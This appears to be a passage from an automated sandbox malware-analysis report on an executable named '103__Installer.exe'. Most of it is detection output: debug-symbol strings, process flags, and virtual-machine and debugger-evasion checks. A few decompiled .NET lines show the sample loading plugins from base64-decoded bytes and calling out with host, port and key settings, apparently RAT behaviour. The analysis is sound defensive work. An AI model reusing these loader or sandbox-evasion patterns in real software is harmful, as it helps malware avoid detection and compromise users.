Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3336013901.0000000006393000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER5186.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdbW source: 103__Installer.exe, 00000000.00000002.3334093675.0000000001559000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb<R source: 103__Installer.exe, 00000000.00000002.3336013901.0000000006380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3334093675.000000000149E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.pdb@b source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: HPmo0C:\Windows\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER5186.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: gmscoBB.pdbc source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: ?yoC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3334093675.000000000156B000.00000004.00000020.00020000.00000000.sdmp, WER5186.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3336013901.0000000006380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[ source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER5186.tmp.dmp.16.dr
Source:	Binary string: @yo.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Management.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Management.ni.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3334093675.0000000001559000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb( source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER5186.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32tM source: 103__Installer.exe, 00000000.00000002.3336013901.00000000063AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: B.pdbc source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER5186.tmp.dmp.16.dr

Source: 103__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 103__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 103__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 103__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 103__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\103__Installer.exe

Code function: 0_2_00B840E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00B840E4

Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B7A985 push ecx; ret	0_2_00B7A998
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B74948 push eax; ret	0_2_00B74966
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B76649 push ecx; ret	0_2_00B7665C
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F8CF38 push eax; retf 03B5h	0_2_05F8D055
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F87550 push es; ret	0_2_05F87560
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F8D4E2 pushfd ; retf	0_2_05F8D4F0
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F8D3FA push esp; retf	0_2_05F8D3FB
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F8D3A5 push esp; retf	0_2_05F8D3A6
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F86B88 pushad ; ret	0_2_05F86B89

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49707

Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\103__Installer.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\103__Installer.exe	Memory allocated: 3B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Memory allocated: 3DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Memory allocated: 3CD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe	Window / User API: threadDelayed 3241			Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Window / User API: threadDelayed 6603			Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe TID: 8160	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe TID: 8172	Thread sleep count: 3241 > 30	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe TID: 8172	Thread sleep count: 6603 > 30	Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe	File opened: C:\Windows\SysWOW64\avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	File opened: C:\Windows\SysWOW64\MSVFW32.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	File opened: C:\Windows\SysWOW64\en-US\MSVFW32.dll.mui	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	File opened: C:\Windows\SysWOW64\en-US\avicap32.dll.mui	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	File opened: C:\Windows\SysWOW64\wbem\en-US\wmiutils.dll.mui	Jump to behavior

Source: Amcache.hve.16.dr	Binary or memory string: VMware
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.16.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.16.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.16.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.16.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.16.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.16.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 103__Installer.exe, 00000000.00000002.3334093675.0000000001505000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.16.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.16.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.16.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.16.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.16.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.16.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.16.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.16.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.16.dr	Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.16.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.16.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.16.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.16.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.16.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.16.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.16.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.16.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.16.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.16.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 103__Installer.exe, 00000000.00000002.3334093675.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: Amcache.hve.16.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\103__Installer.exe	API call chain: ExitProcess graph end node			graph_0-25695
Source: C:\Users\user\Desktop\103__Installer.exe	API call chain: ExitProcess graph end node			graph_0-25878

Source: C:\Users\user\Desktop\103__Installer.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe

Code function: 0_2_00B765D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00B765D1

Source: C:\Users\user\Desktop\103__Installer.exe

0_2_00B840E4

Source: C:\Users\user\Desktop\103__Installer.exe

Code function: 0_2_03AC1628 mov eax, dword ptr fs:[00000030h]

0_2_03AC1628

Source: C:\Users\user\Desktop\103__Installer.exe

Code function: 0_2_00B87CB1 RpcServerRegisterIf3,__lseeki64_nolock,RpcServerRegisterIf3,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_00B87CB1

Source: C:\Users\user\Desktop\103__Installer.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B765D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B765D1
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B7A71E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B7A71E
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B7C71D SetUnhandledExceptionFilter,	0_2_00B7C71D

Source: C:\Users\user\Desktop\103__Installer.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe

Code function: 0_2_00B71671 cpuid

0_2_00B71671

Source: C:\Users\user\Desktop\103__Installer.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00B7F8E5
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_00B7F825
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: GetLocaleInfoA,	0_2_00B84859
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_00B7F988
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00B7F94C
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_00B7DBBB
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_00B844BA
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00B7EC3A
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00B7F45D
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00B84594
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_00B7F5F9
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_00B7F552
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_00B7F654
